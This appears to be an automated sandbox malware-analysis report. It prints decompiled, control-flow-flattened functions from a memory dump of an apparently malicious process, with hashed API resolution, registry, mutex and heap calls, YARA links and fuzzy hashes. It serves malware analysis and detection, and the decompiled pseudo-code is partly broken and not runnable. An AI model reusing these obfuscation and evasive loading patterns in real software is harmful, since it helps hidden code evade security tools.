                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess$AllocateCreateHeapMutexSleep
                                                                                                                                                        • String ID: 0u$?VN$?VN$c/9$c/9$Ug$Ug
                                                                                                                                                        • API String ID: 2152516511-3375559661
                                                                                                                                                        • Opcode ID: 408de1cb32e6a23b8f6d86f31cac7ebb337cbef467db620d4c6511f590c7df8b
                                                                                                                                                        • Instruction ID: 27753954ef1f128f17bad375bb1e3f1e325c52adba578bed83f1002e55f39ef8
                                                                                                                                                        • Opcode Fuzzy Hash: 408de1cb32e6a23b8f6d86f31cac7ebb337cbef467db620d4c6511f590c7df8b
                                                                                                                                                        • Instruction Fuzzy Hash: EA12D7727182858FCB6C871AD4A073E7691E788754F64011AF64BD7F64DEA8CCC0AF45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00FDEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E00FDEFD3(intOrPtr __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r11) {
				long long _v72;
				long long _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				long long _v104;
				long long _v112;
				intOrPtr _t24;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				long long _t56;
				long long _t61;
				void* _t63;
				long long _t64;
				long long _t66;
				void* _t68;
				void* _t69;
				long long _t70;

				_t69 = __r11;
				_t68 = __r8;
				_t63 = __rdx;
				_t62 = __rcx;
				_t56 = __rax;
				_t66 = __rcx;
				_v84 = r8d;
				_t34 =  ==  ? 0x64798daa : 0x23a3853d;
				_v88 =  ==  ? 0x64798daa : 0x23a3853d;
				r13d = 0x8f34f1b0;
				r13d =  ==  ? 0x84c104ed : r13d;
				_v92 = __edx;
				r14d = 0x71c9cf43;
				r14d =  ==  ? 0xf3019199 : r14d;
				_t24 = 0xf82b818e;
				while(1) {
					L1:
					_t35 = _t24;
					if(_t24 <= 0x18bc41aa) {
						break;
					}
					if(_t35 > 0x38ab292f) {
						if(_t35 > 0x65e67dfa) {
							if(_t35 == 0x71c9cf43) {
								r12d = 0;
								_t64 = _t66;
								_t24 = r13d;
								continue;
							}
							_t24 = _t35;
							if(_t35 != 0x65e67dfb) {
								continue;
							}
							return _t24;
						}
						if(_t35 == 0x38ab2930) {
							_t56 = _v112;
							_t24 = 0x98ea932f;
							if( *_t56 != 0) {
								_t24 = 0x33675366;
							}
							L40:
							_t61 = _v104;
							continue;
						}
						_t24 = _t35;
						if(_t35 == 0x64798daa) {
							_t24 = 0x65e67dfb;
						}
						continue;
					}
					if(_t35 > 0x2f447a17) {
						if(_t35 == 0x2f447a18) {
							_t24 = 0xfaff49ef;
							continue;
						}
						_t24 = _t35;
						if(_t35 != 0x33675366) {
							continue;
						}
						r8d = 0x18d1ea71;
						r9d = 0x2b;
						E00FDFAD7(1, 0, _t56, _t62);
						_t62 = _v112;
						 *_t56();
						_t61 = _t56;
						_t24 = 0x18bc41ab;
						if(_t61 == 0) {
							continue;
						}
						L32:
						_t24 = 0x98ea932f;
						continue;
					}
					if(_t35 == 0x18bc41ab) {
						r8d = 0x84161500;
						r9d = 2;
						E00FDFAD7(1, 0, _t56, _t62);
						_t62 = _v112; // executed
						LoadLibraryA(??); // executed
						goto L32;
					} else {
						_t24 = _t35;
						if(_t35 == 0x23a3853d) {
							_t62 = _v72;
							E00FDF29F(_v84, _t44, _t46, _v72, _t63, _t68, _t69);
							_v80 = _t56;
							_t24 = 0xe79882b1;
							if(_v80 != 0) {
								_t24 = 0x2f447a18;
							}
						}
						continue;
					}
				}
				if(_t35 <= 0xe79882b0) {
					if(_t35 == 0x84c104ed) {
						E00FDF5B9(_v92);
						_t64 = _t56;
						_t24 = 0x8f34f1b0;
						r12d = 0;
						goto L1;
					}
					if(_t35 == 0x8f34f1b0) {
						_v104 = _t70;
						_v112 = _t64;
						_t62 = _v104;
						_t43 = 0x38ab2930;
						if(_v112 == _t61) {
							_t43 = 0x98ea932f;
						}
						_t24 =  ==  ? _t43 : 0x98ea932f;
						goto L40;
					}
					_t24 = _t35;
					if(_t35 == 0x98ea932f) {
						_v72 = _t61;
						_t24 = _v88;
					}
				} else {
					if(_t35 > 0xf82b818d) {
						_t24 = r14d;
						if(_t35 != 0xf82b818e) {
							_t24 = _t35;
							if(_t35 == 0xfaff49ef) {
								_t24 = 0x65e67dfb;
							}
						}
					} else {
						if(_t35 == 0xe79882b1) {
							_t24 = 0xfaff49ef;
						} else {
							_t24 = _t35;
							if(_t35 == 0xf3019199) {
								_t24 = 0x8f34f1b0;
								_t70 =  *0xfe5030;
								_t64 = _t66;
							}
						}
					}
				}
			}























                                                                                                                                                        0x00fdefd3
                                                                                                                                                        0x00fdefd3
                                                                                                                                                        0x00fdefd3
                                                                                                                                                        0x00fdefd3
                                                                                                                                                        0x00fdefd3
                                                                                                                                                        0x00fdefe3
                                                                                                                                                        0x00fdefe6
                                                                                                                                                        0x00fdeff8
                                                                                                                                                        0x00fdeffb
                                                                                                                                                        0x00fdf007
                                                                                                                                                        0x00fdf00d
                                                                                                                                                        0x00fdf011
                                                                                                                                                        0x00fdf01d
                                                                                                                                                        0x00fdf023
                                                                                                                                                        0x00fdf027
                                                                                                                                                        0x00fdf02c
                                                                                                                                                        0x00fdf02c
                                                                                                                                                        0x00fdf02c
                                                                                                                                                        0x00fdf033
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf03b
                                                                                                                                                        0x00fdf0d2
                                                                                                                                                        0x00fdf1b4
                                                                                                                                                        0x00fdf27d
                                                                                                                                                        0x00fdf280
                                                                                                                                                        0x00fdf283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf283
                                                                                                                                                        0x00fdf1ba
                                                                                                                                                        0x00fdf1c2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf29e
                                                                                                                                                        0x00fdf29e
                                                                                                                                                        0x00fdf0de
                                                                                                                                                        0x00fdf208
                                                                                                                                                        0x00fdf210
                                                                                                                                                        0x00fdf215
                                                                                                                                                        0x00fdf217
                                                                                                                                                        0x00fdf217
                                                                                                                                                        0x00fdf264
                                                                                                                                                        0x00fdf264
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf264
                                                                                                                                                        0x00fdf0e4
                                                                                                                                                        0x00fdf0ec
                                                                                                                                                        0x00fdf0f7
                                                                                                                                                        0x00fdf0f7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf0ec
                                                                                                                                                        0x00fdf047
                                                                                                                                                        0x00fdf13b
                                                                                                                                                        0x00fdf26e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf273
                                                                                                                                                        0x00fdf141
                                                                                                                                                        0x00fdf149
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf15b
                                                                                                                                                        0x00fdf161
                                                                                                                                                        0x00fdf167
                                                                                                                                                        0x00fdf16c
                                                                                                                                                        0x00fdf16f
                                                                                                                                                        0x00fdf171
                                                                                                                                                        0x00fdf174
                                                                                                                                                        0x00fdf17c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf1f2
                                                                                                                                                        0x00fdf1f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf1f2
                                                                                                                                                        0x00fdf053
                                                                                                                                                        0x00fdf1d9
                                                                                                                                                        0x00fdf1df
                                                                                                                                                        0x00fdf1e5
                                                                                                                                                        0x00fdf1ea
                                                                                                                                                        0x00fdf1ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf059
                                                                                                                                                        0x00fdf059
                                                                                                                                                        0x00fdf061
                                                                                                                                                        0x00fdf063
                                                                                                                                                        0x00fdf06c
                                                                                                                                                        0x00fdf071
                                                                                                                                                        0x00fdf07c
                                                                                                                                                        0x00fdf081
                                                                                                                                                        0x00fdf083
                                                                                                                                                        0x00fdf083
                                                                                                                                                        0x00fdf081
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf061
                                                                                                                                                        0x00fdf053
                                                                                                                                                        0x00fdf090
                                                                                                                                                        0x00fdf107
                                                                                                                                                        0x00fdf222
                                                                                                                                                        0x00fdf227
                                                                                                                                                        0x00fdf22a
                                                                                                                                                        0x00fdf22f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf22f
                                                                                                                                                        0x00fdf113
                                                                                                                                                        0x00fdf237
                                                                                                                                                        0x00fdf23c
                                                                                                                                                        0x00fdf241
                                                                                                                                                        0x00fdf246
                                                                                                                                                        0x00fdf257
                                                                                                                                                        0x00fdf259
                                                                                                                                                        0x00fdf259
                                                                                                                                                        0x00fdf261
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdf261
                                                                                                                                                        0x00fdf119
                                                                                                                                                        0x00fdf121
                                                                                                                                                        0x00fdf127
                                                                                                                                                        0x00fdf12c
                                                                                                                                                        0x00fdf12c
                                                                                                                                                        0x00fdf092
                                                                                                                                                        0x00fdf098
                                                                                                                                                        0x00fdf184
                                                                                                                                                        0x00fdf18d
                                                                                                                                                        0x00fdf193
                                                                                                                                                        0x00fdf19b
                                                                                                                                                        0x00fdf1a1
                                                                                                                                                        0x00fdf1a6
                                                                                                                                                        0x00fdf19b
                                                                                                                                                        0x00fdf09e
                                                                                                                                                        0x00fdf0a4
                                                                                                                                                        0x00fdf1fc
                                                                                                                                                        0x00fdf0aa
                                                                                                                                                        0x00fdf0aa
                                                                                                                                                        0x00fdf0b2
                                                                                                                                                        0x00fdf0b8
                                                                                                                                                        0x00fdf0bd
                                                                                                                                                        0x00fdf0c4
                                                                                                                                                        0x00fdf0c4
                                                                                                                                                        0x00fdf0b2
                                                                                                                                                        0x00fdf0a4
                                                                                                                                                        0x00fdf098

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,EA203201,079849AE,E8F2AD3B,00000095,?,?,00000001,00FDFC0A,?,?,079849AE,E8F2AD3B), ref: 00FDF1ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: fSg3$fSg3
                                                                                                                                                        • API String ID: 1029625771-263991881
                                                                                                                                                        • Opcode ID: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction ID: ee37e465e558149de2f8f56175dce107380e7cda17a6306e15601e935bfc0a16
                                                                                                                                                        • Opcode Fuzzy Hash: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction Fuzzy Hash: 7D511822714550C6DB284639B898F3D69A2BB547F4F6C403BFE4BCBB15D62DCC49A710
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00FDCDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E00FDCDB9(void* __ecx, long long __rax) {
				long long _v48;
				void* _t5;
				void* _t21;
				void* _t23;
				long long _t29;
				void* _t36;
				void* _t40;

				_t29 = __rax;
				_t21 = __ecx;
				_t23 =  ==  ? 0x79212036 : 0xea203201;
				_t5 = 0x534cbae1;
				r14d = 0xe8f2ad3b;
				L1:
				while(1) {
					if(_t5 <= 0x4eab221e) {
						if(_t5 == 0xe8f2ad3b) {
							_t5 = 0x4eab221f;
						} else {
							if(_t5 == 0xea203201) {
								r8d = 0x54cac072;
								r9d = 0x95;
								E00FDFAD7(1, _t21, _t29, _t33);
								 *_t29();
								_v48 = _t29;
								_t5 =  ==  ? r14d : 0x2f3e82e;
							} else {
								if(_t5 == 0x2f3e82e) {
									r8d = 0x12cfae43;
									r9d = 0x96;
									E00FDFAD7(1, _t21, _t29, _t33);
									RtlAllocateHeap(??, ??, ??); // executed
									_t33 = _t29;
									E00FDC8BC(0, _t29, _t29, _t36, _t40);
									_t5 = 0xe8f2ad3b;
								}
							}
						}
						continue;
					}
					if(_t5 == 0x4eab221f) {
						return _t5;
					}
					if(_t5 == 0x534cbae1) {
						_t5 = _t23;
					} else {
						if(_t5 == 0x79212036) {
							_t5 = 0x4eab221f;
						}
					}
				}
			}










                                                                                                                                                        0x00fdcdb9
                                                                                                                                                        0x00fdcdc3
                                                                                                                                                        0x00fdcdd1
                                                                                                                                                        0x00fdcdd4
                                                                                                                                                        0x00fdcdd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdcddf
                                                                                                                                                        0x00fdcde4
                                                                                                                                                        0x00fdcdeb
                                                                                                                                                        0x00fdce57
                                                                                                                                                        0x00fdcded
                                                                                                                                                        0x00fdcdf2
                                                                                                                                                        0x00fdce6b
                                                                                                                                                        0x00fdce71
                                                                                                                                                        0x00fdce77
                                                                                                                                                        0x00fdce7c
                                                                                                                                                        0x00fdce7e
                                                                                                                                                        0x00fdce8e
                                                                                                                                                        0x00fdcdf4
                                                                                                                                                        0x00fdcdf9
                                                                                                                                                        0x00fdce07
                                                                                                                                                        0x00fdce0d
                                                                                                                                                        0x00fdce13
                                                                                                                                                        0x00fdce20
                                                                                                                                                        0x00fdce25
                                                                                                                                                        0x00fdce2d
                                                                                                                                                        0x00fdce32
                                                                                                                                                        0x00fdce32
                                                                                                                                                        0x00fdcdf9
                                                                                                                                                        0x00fdcdf2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdcdeb
                                                                                                                                                        0x00fdce3e
                                                                                                                                                        0x00fdcead
                                                                                                                                                        0x00fdcead
                                                                                                                                                        0x00fdce45
                                                                                                                                                        0x00fdce99
                                                                                                                                                        0x00fdce47
                                                                                                                                                        0x00fdce4c
                                                                                                                                                        0x00fdce4e
                                                                                                                                                        0x00fdce53
                                                                                                                                                        0x00fdce4c
                                                                                                                                                        0x00fdce45

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00FE0A77), ref: 00FDCE20
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID: 6 !y$6 !y
                                                                                                                                                        • API String ID: 1279760036-2075727267
                                                                                                                                                        • Opcode ID: ace1e1f7354e43219aaef62e33cf0548d855f00e3c2b989caf3d60ba01407e6d
                                                                                                                                                        • Instruction ID: 308970fbb200d81e42aad027f733d9b8df6ff7cdee12469e317de4e1623ff60b
                                                                                                                                                        • Opcode Fuzzy Hash: ace1e1f7354e43219aaef62e33cf0548d855f00e3c2b989caf3d60ba01407e6d
                                                                                                                                                        • Instruction Fuzzy Hash: 91117111B856464DDF34255A6C50B1A4D434B587E8F2C453B7F1DDBB00E529CD52E388
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00FD3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00FD3A22(long long __rax, intOrPtr __rcx, long long* __rdx) {
				long long _v32;
				intOrPtr _v36;
				signed char _t12;
				void* _t18;
				void* _t26;
				long long _t31;
				long long* _t36;

				_t32 = __rcx;
				_t31 = __rax;
				_t36 = __rdx;
				r8d = 0x7ae3257e;
				r9d = 0x42;
				E00FDFAD7(1, _t26, __rax, __rcx);
				 *_t31(); // executed
				_v32 = _t31;
				r8d = 0xce1f1c4e;
				r9d = 0xc5;
				E00FDFAD7(1, _t26, _t31, __rcx);
				_v36 =  *_t31();
				_t18 = 0x953bce87;
				L1:
				while(_t18 > 0x346ca2b9) {
					if(_t18 == 0x346ca2ba) {
						r8d = 0x2db58ff7;
						r9d = 0x11;
						E00FDFAD7(1, _t26, _t31, _t32);
						_t32 = _v32;
						 *_t31();
						_t18 = 0x6b45cfdb;
						_t12 = 1;
						continue;
					}
					if(_t18 != 0x6b45cfdb) {
						continue;
					}
					return _t12 & 0x00000001;
				}
				if(_t18 == 0x953bce87) {
					_t18 =  ==  ? 0x346ca2ba : 0x263eb76d;
				} else {
					if(_t18 == 0x263eb76d) {
						_t31 = _v32;
						 *_t36 = _t31;
						_t18 = 0x6b45cfdb;
						_t12 = 0;
					}
				}
				goto L1;
			}










                                                                                                                                                        0x00fd3a22
                                                                                                                                                        0x00fd3a22
                                                                                                                                                        0x00fd3a29
                                                                                                                                                        0x00fd3a36
                                                                                                                                                        0x00fd3a3c
                                                                                                                                                        0x00fd3a42
                                                                                                                                                        0x00fd3a4e
                                                                                                                                                        0x00fd3a50
                                                                                                                                                        0x00fd3a5c
                                                                                                                                                        0x00fd3a62
                                                                                                                                                        0x00fd3a68
                                                                                                                                                        0x00fd3a6f
                                                                                                                                                        0x00fd3a73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd3a7d
                                                                                                                                                        0x00fd3aac
                                                                                                                                                        0x00fd3ad8
                                                                                                                                                        0x00fd3ade
                                                                                                                                                        0x00fd3ae4
                                                                                                                                                        0x00fd3ae9
                                                                                                                                                        0x00fd3aec
                                                                                                                                                        0x00fd3aee
                                                                                                                                                        0x00fd3af3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd3af3
                                                                                                                                                        0x00fd3ab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd3b00
                                                                                                                                                        0x00fd3b00
                                                                                                                                                        0x00fd3a8b
                                                                                                                                                        0x00fd3ac7
                                                                                                                                                        0x00fd3a8d
                                                                                                                                                        0x00fd3a93
                                                                                                                                                        0x00fd3a95
                                                                                                                                                        0x00fd3a9a
                                                                                                                                                        0x00fd3a9d
                                                                                                                                                        0x00fd3aa2
                                                                                                                                                        0x00fd3aa2
                                                                                                                                                        0x00fd3a93
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,00FE09DE), ref: 00FD3A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                        • String ID: ~%z
                                                                                                                                                        • API String ID: 1964310414-678350322
                                                                                                                                                        • Opcode ID: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction ID: a203d5128c1e04c33a088d96fe04b23705e38f6f95397a4cd85762d21572e7d9
                                                                                                                                                        • Opcode Fuzzy Hash: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction Fuzzy Hash: 6111086B71858042D73C0A1568A1B39368387987D4F1C013BEA4F9BF95C81D8A826703
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00FD7B43, Relevance: 1.7, APIs: 1, Instructions: 213registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                        			E00FD7B43(intOrPtr __edx, long long __rax, void* __rcx) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v112;
				signed long long _v120;
				long long _v128;
				long long _v136;
				intOrPtr _v140;
				long long _v152;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v181;
				long long _v192;
				long long _v200;
				void* _t69;
				intOrPtr _t108;
				long long _t115;
				signed long long _t123;
				intOrPtr* _t131;
				void* _t140;
				void* _t144;
				void* _t146;
				signed long long _t147;
				long long _t148;

				_t115 = __rax;
				_t144 =  &_v168;
				_t108 = __edx;
				_t140 = __rcx;
				E00FDCDB9(0xc8, __rax);
				_v152 = _t115;
				_t131 =  &_v180;
				_v136 = _t131;
				 *_t131 = 0;
				_v128 =  &_v160;
				_v88 = _t140 + 0xb44;
				_v96 = _t140 + 0x294;
				_v104 = _t140 + 0x280;
				_v140 = _t108;
				r12d = 0xf11b687f;
				r12d =  ==  ? 0xf83e1c76 : r12d;
				r15d = 0x5c7553b0;
				r15d =  ==  ? 0xdab00bc5 : r15d;
				_t15 = _t140 + 0x5d2; // 0x5c755982
				_v112 = _t15;
				_t17 = _t140 + 0x650; // 0x5c755a00
				_t123 = _t17;
				_v120 = _t123;
				_t69 = 0xbda386ba;
				L1:
				while(1) {
					while(_t69 > 0xdab00bc4) {
						if(_t69 <= 0xf83e1c75) {
							if(_t69 == 0xdab00bc5) {
								 *((short*)(_t140 + 0x294)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x664));
								_t69 = 0x5c7553b0;
								_t147 = _v104;
								_t148 = _v96;
								continue;
							}
							if(_t69 == 0xe6671123) {
								_t69 =  !=  ? 0x9491a652 : 0x1c0ab71e;
								continue;
							}
							if(_t69 != 0xf11b687f) {
								continue;
							}
							L29:
							_t69 = 0xd22e7491;
							continue;
						}
						if(_t69 > 0x38db78b6) {
							if(_t69 == 0x38db78b7) {
								r13d = 0;
								r14d = 0;
								_t69 = r15d;
								continue;
							}
							if(_t69 != 0x5c7553b0) {
								continue;
							}
							_v80 = _t147;
							_v72 = _t148;
							_v176 = 0;
							_v172 = 0x4cf804b1;
							_v168 = 0x5dec0a95;
							_v164 = 0x38ed4ebe;
							if(_v176 != 0) {
								L25:
								E00FE020E(_t123, _v152,  &_v172, _v88, _t146);
								r8d = 0x6e0c8ed2;
								r9d = 0xd6;
								E00FDFAD7(2, _t108, _t123, _v152);
								_t41 =  &_v160; // 0xf11b68c7
								_v200 = _t41;
								r8d = 0;
								r9d = 0x20019; // executed
								RegOpenKeyExA(??, ??, ??, ??, ??); // executed
								_t131 = _v152;
								E00FDCC2E(_t123, _t131);
								_t69 =  ==  ? 0xc40b2334 : 0xbedb4fc6;
								continue;
							}
							do {
								 *(_t144 + 0x38 + _t123 * 4) = ( *(_t144 + 0x38 + _t123 * 4) & 0xfeab8f08 |  !( *(_t144 + 0x38 + _t123 * 4)) & 0x015470f7) ^ 0x39ca1b15;
								_t131 = _t131 + 1;
								_t123 = _t123 + 1;
							} while (_t123 != 4);
							goto L25;
						} else {
							if(_t69 == 0xf83e1c76) {
								 *((intOrPtr*)(_t140 + 0x664)) = _v180;
								_t69 = 0xf11b687f;
							} else {
								if(_t69 == 0x1c0ab71e) {
									_t69 = r12d;
								}
							}
							continue;
						}
					}
					if(_t69 <= 0xbda386b9) {
						if(_t69 == 0x8f6e5d8a) {
							goto L29;
						}
						if(_t69 == 0x9491a652) {
							 *((intOrPtr*)(_t140 + 0x638)) = _v180;
							_t69 = 0xf11b687f;
						} else {
							if(_t69 == 0xa8bc8896) {
								 *((short*)(_t140 + 0x5d2)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x638));
								_t69 = 0x5c7553b0;
								_t147 = _v120;
								_t148 = _v112;
							}
						}
						continue;
					}
					if(_t69 > 0xc40b2333) {
						if(_t69 == 0xc40b2334) {
							r8d = 0xbdd87e1e;
							r9d = 0xde;
							E00FDFAD7(2, _t108, _t123, _t131);
							_t60 =  &_v180; // 0xf11b68b3
							_v192 = _t60;
							_v200 = _v72;
							r8d = 0;
							r9d = 0;
							 *_t123();
							r8d = 0x96bc22d6;
							r9d = 0xe0;
							E00FDFAD7(2, _t108, _t123, _v160);
							_t131 = _v160;
							 *_t123();
							_t69 =  ==  ? 0xe6671123 : 0x8f6e5d8a;
							continue;
						}
						if(_t69 != 0xd22e7491) {
							continue;
						}
						return _t69;
					}
					if(_t69 == 0xbda386ba) {
						_v181 = _v140 == 1;
						_t69 =  !=  ? 0xa8bc8896 : 0x38db78b7;
						continue;
					}
					if(_t69 != 0xbedb4fc6) {
						continue;
					}
					goto L29;
				}
			}

































                                                                                                                                                        0x00fd7b43
                                                                                                                                                        0x00fd7b4f
                                                                                                                                                        0x00fd7b56
                                                                                                                                                        0x00fd7b58
                                                                                                                                                        0x00fd7b60
                                                                                                                                                        0x00fd7b65
                                                                                                                                                        0x00fd7b6a
                                                                                                                                                        0x00fd7b6f
                                                                                                                                                        0x00fd7b79
                                                                                                                                                        0x00fd7b84
                                                                                                                                                        0x00fd7b95
                                                                                                                                                        0x00fd7ba4
                                                                                                                                                        0x00fd7bb3
                                                                                                                                                        0x00fd7bbb
                                                                                                                                                        0x00fd7bc7
                                                                                                                                                        0x00fd7bcd
                                                                                                                                                        0x00fd7bd6
                                                                                                                                                        0x00fd7bdc
                                                                                                                                                        0x00fd7be0
                                                                                                                                                        0x00fd7be7
                                                                                                                                                        0x00fd7bec
                                                                                                                                                        0x00fd7bec
                                                                                                                                                        0x00fd7bf3
                                                                                                                                                        0x00fd7bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7bfd
                                                                                                                                                        0x00fd7bfd
                                                                                                                                                        0x00fd7c09
                                                                                                                                                        0x00fd7c5b
                                                                                                                                                        0x00fd7e0b
                                                                                                                                                        0x00fd7e1a
                                                                                                                                                        0x00fd7e1e
                                                                                                                                                        0x00fd7e23
                                                                                                                                                        0x00fd7e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7e2b
                                                                                                                                                        0x00fd7c66
                                                                                                                                                        0x00fd7e47
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7e47
                                                                                                                                                        0x00fd7c71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7dcc
                                                                                                                                                        0x00fd7dcc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7dcc
                                                                                                                                                        0x00fd7c10
                                                                                                                                                        0x00fd7cc5
                                                                                                                                                        0x00fd7e63
                                                                                                                                                        0x00fd7e66
                                                                                                                                                        0x00fd7e69
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7e69
                                                                                                                                                        0x00fd7cd0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7cd6
                                                                                                                                                        0x00fd7cde
                                                                                                                                                        0x00fd7ce8
                                                                                                                                                        0x00fd7cec
                                                                                                                                                        0x00fd7cf4
                                                                                                                                                        0x00fd7cfc
                                                                                                                                                        0x00fd7d08
                                                                                                                                                        0x00fd7d3d
                                                                                                                                                        0x00fd7d4f
                                                                                                                                                        0x00fd7d60
                                                                                                                                                        0x00fd7d66
                                                                                                                                                        0x00fd7d6c
                                                                                                                                                        0x00fd7d71
                                                                                                                                                        0x00fd7d76
                                                                                                                                                        0x00fd7d85
                                                                                                                                                        0x00fd7d88
                                                                                                                                                        0x00fd7d8e
                                                                                                                                                        0x00fd7d93
                                                                                                                                                        0x00fd7d98
                                                                                                                                                        0x00fd7da9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7da9
                                                                                                                                                        0x00fd7d11
                                                                                                                                                        0x00fd7d2d
                                                                                                                                                        0x00fd7d31
                                                                                                                                                        0x00fd7d34
                                                                                                                                                        0x00fd7d37
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7c16
                                                                                                                                                        0x00fd7c1b
                                                                                                                                                        0x00fd7dda
                                                                                                                                                        0x00fd7de0
                                                                                                                                                        0x00fd7c21
                                                                                                                                                        0x00fd7c26
                                                                                                                                                        0x00fd7c28
                                                                                                                                                        0x00fd7c28
                                                                                                                                                        0x00fd7c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7c1b
                                                                                                                                                        0x00fd7c10
                                                                                                                                                        0x00fd7c32
                                                                                                                                                        0x00fd7c7d
